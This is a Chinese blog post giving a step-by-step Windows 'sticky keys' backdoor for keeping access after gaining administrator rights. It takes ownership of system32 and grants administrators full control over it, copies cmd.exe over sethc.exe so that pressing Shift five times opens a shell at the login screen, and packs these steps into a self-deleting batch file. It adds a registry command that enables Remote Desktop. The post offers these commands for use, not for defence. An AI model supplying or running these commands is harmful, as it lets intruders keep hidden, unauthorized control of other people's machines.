shift后门制作 - JunMo博客

JunMo的博客

2019
记录生活
首页 » 权限维持 » shift后门制作

shift后门制作

我们看到了当前就已经获得了管理员权限了。

接下来通过如下命令将来sethc.exe替换为cmd 然后远程服务器 5下Shift调出cmd

可是发现拒绝访问。

出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

takeown /f c:\windows\system32\*.*   /a /r /d y

然后在运行

cacls  c:\windows\system32\*.*  /T /E /G administrators:F

目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
然后系统文件夹权限

然后即可替换sethc了

copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

我们可以把这些命令做成一个批处理

takeown /f c:\windows\system32\*.*   /a /r /d y
cacls  c:\windows\system32\*.*  /T /E /G administrators:F
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
del shift.bat
exit

附带一个开启3389远程桌面的命令

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

08 win10测试成功

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-24.html
并注明出处 JunMo博客
原文地址《 shift后门制作
发布于2019-7-5
收录状态: [百度已收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册